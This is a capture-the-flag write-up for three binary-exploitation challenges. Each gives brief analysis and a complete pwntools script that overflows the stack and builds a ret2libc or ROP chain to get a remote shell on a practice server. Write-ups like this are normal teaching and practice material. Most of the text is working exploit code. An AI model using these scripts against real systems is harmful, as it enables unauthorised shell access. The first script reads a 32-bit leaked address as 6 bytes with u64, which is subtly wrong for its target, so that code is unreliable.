[OGeek2019]babyrop
32-bit elf file, put it into 32-bit ida, first look at the logic, and the
main function of the vulnerability point:
/dev/urandom This directory is for generating random numbers
and then the following functions, sub_804871F
does not have a loophole, then look The following function sub_80487D0
should make a1 large enough to complete the stack overflow.
a1 is also related to v2. v2=a2[7], a2 is the data we input,
so the vulnerability point is found.
But there is one thing to pay attention to.
This place will compare two data, so we make v1 equal to 0, that is, pass \x00 to bypass the length detection of strlen, so that the first 0 bits of them must be equal.
Checksec again,
did not find the system function and /bin/sh string
, and gave a libc-2.23.so file
, so this question should be a classic 32-bit retlibc question.
The script is as follows:
from pwn import *
context(os = "linux", arch = "i386")
context.log_level = 'debug'
p=remote("node4.buuoj.cn",29035)
elf=ELF("./pwn13")
libc=ELF("./libc-2.23.so")
ret=0x08048502
main=0x08048825
write_plt=elf.plt['write']
read_got=elf.got['read']
pay=b'\x00'+b'\xff'*0x18 #\x表示的十六进制,意思就是16进制的ff
p.sendline(pay)
p.recvuntil("Correct\n")
payload=b'a'*(0xe7+4)+p32(write_plt)+p32(main)+p32(1)+p32(read_got)+p32(4)
p.sendline(payload)
read_addr=u64(p.recv(6).ljust(8,b'\x00'))
print(hex(read_addr))
libc_base=read_addr-libc.sym['read']
sys=libc.sym['system']+libc_base
bin=libc_base+libc.search(b"/bin/sh").__next__()
pay=b'\x00'+b'\xff'*0x18
p.sendline(pay)
p.recvuntil("Correct\n")
payload=b'a'*(0xe7+4)+p32(sys)+p32(ret)+p32(bin)
p.sendline(payload)
p.interactive()
jarvisoj_level2_x64
64-bit elf file, put it into 64-bit ida to see the main logic.
There are system functions and an overflow point. Shift+f12 to see if there is a /bin/sh string. If so,
you need a pop rdi ret
and then checksec
Then directly system
constructs rop
from pwn import *
context(log_level='debug',os='linux',arch='amd64')
p=remote("node4.buuoj.cn",26205)
#p=process("./pwn14")
sys=0x4004C0
bin=0x600A90
ret=0x00000000004004a1
pop=0x00000000004006b3
payload=b'a'*(0x80+8)+p64(pop)+p64(bin)+p64(ret)+p64(sys)
p.sendline(payload)
p.interactive()
[HarekazeCTF2019]baby_rop
64-bit elf file, throw it into 64-bit ida
and find an overflow point, and there is a system function, check if there is /bin/sh
and then checksec
Then this question is almost the same as above.
Construct rop
from pwn import *
context(log_level='debug',os='linux',arch='amd64')
p=remote("node4.buuoj.cn",27033)
#p=process("./pwn14")
sys=0x400490
bin=0x601048
ret=0x0000000000400479
pop=0x0000000000400683
payload=b'a'*(0x10+8)+p64(pop)+p64(bin)+p64(ret)+p64(sys)
p.sendline(payload)
p.interactive()
ciscn_2019_en_2
This question has been posted before, exactly the same, the classic retlibc
64-bit question
The following is what I wrote before:
https://blog.csdn.net/cainiao78777/article/details/127988372?spm=1001.2014.3001.5501